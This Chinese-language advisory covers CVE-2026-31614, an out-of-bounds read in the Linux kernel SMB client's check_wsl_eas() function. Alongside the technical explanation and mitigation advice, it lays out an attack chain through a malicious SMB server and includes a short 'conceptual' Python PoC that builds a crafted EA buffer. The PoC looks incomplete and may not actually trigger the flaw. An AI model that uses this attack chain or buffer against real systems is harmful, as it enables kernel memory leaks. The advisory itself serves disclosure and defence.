CVE-2026-31614 CVSS 7.1 高危

CVE-2026-31614 Linux Kernel SMB Client越界读取漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31614

漏洞类型

越界读取

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核SMB客户端模块在处理WSL扩展属性时存在边界检查错误。由于未正确计算结构体头部偏移量，导致解析时发生越界读取。该漏洞允许恶意SMB服务器利用此问题泄露最多8字节的内核堆内存，并干扰后续属性解析。

技术细节

漏洞位于Linux内核的`smb: client`驱动中`check_wsl_eas()`函数。该函数使用`(u8 *)ea + nlen + 1 + vlen`作为边界检查的结束点，但实际读取EA名称和值的起始位置是`ea->ea_data`。由于`ea_data`相对于`ea`有`sizeof(struct smb2_file_full_ea_info)`即8字节的偏移，当EA数据位于响应缓冲区末尾附近时，原有的检查无法防止越界读取。攻击者可通过控制SMB服务器响应，触发内核读取iov缓冲区之外的内存，从而泄露内核堆数据并影响WSL xattr的解释逻辑。

攻击链分析

STEP 1

1. 环境准备

攻击者搭建恶意的SMB服务器，准备包含特制扩展属性（EA）的响应数据。

STEP 2

2. 诱导连接

诱导受害者或本地用户挂载攻击者控制的SMB共享，或者通过本地配置连接到恶意服务。

STEP 3

3. 触发解析

当Linux内核客户端尝试读取文件属性（特别是WSL相关的xattr）时，调用check_wsl_eas()函数解析数据。

STEP 4

4. 越界读取

由于边界计算错误，内核在执行strncmp比较EA名称时，读取了iov缓冲区之外的8字节内存。

STEP 5

5. 信息泄露

攻击者通过分析客户端行为或响应差分，获取泄露的内核堆内存数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# Conceptual PoC for CVE-2026-31614
# This script demonstrates how to construct a malicious SMB2 EA structure
# that triggers the off-by-8 bounds check in the Linux kernel.

def create_malicious_ea_buffer():
    # The struct smb2_file_full_ea_info is 8 bytes:
    # uint32_t next_entry_offset
    # uint8_t  flags
    # uint8_t  ea_name_length
    # uint16_t ea_value_length
    
    # We set the lengths such that the data sits near the buffer end.
    # The kernel calculates end as (u8*)ea + nlen + 1 + vlen.
    # But reads start at ea->ea_data (offset 8).
    # If (ea + nlen + 1 + vlen) is within bounds, but (ea + 8 + nlen + 1 + vlen) is not,
    # we trigger the read overflow.
    
    header = struct.pack('<I', 0)  # NextEntryOffset: 0 (Last entry)
    header += struct.pack('<B', 0) # Flags: 0
    header += struct.pack('<B', 4) # EaNameLength: 4 (e.g., "Test")
    header += struct.pack('<H', 0) # EaValueLength: 0
    
    ea_name = b'Test\x00' # Null-terminated name
    # No value payload needed for the leak demo, just the read attempt
    
    return header + ea_name

if __name__ == "__main__":
    buf = create_malicious_ea_buffer()
    print(f"Malicious EA Buffer Length: {len(buf)} bytes")
    print(f"Buffer Hex: {buf.hex()}")
    # In a real exploit, this buffer would be sent via a crafted SMB2 QUERY_INFO response.

影响范围

Linux Kernel (请参考Git补丁提交确定具体受影响版本)

防御指南

临时缓解措施

建议用户避免挂载来源不明的SMB共享，并在应用官方补丁前限制本地用户对SMB客户端的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表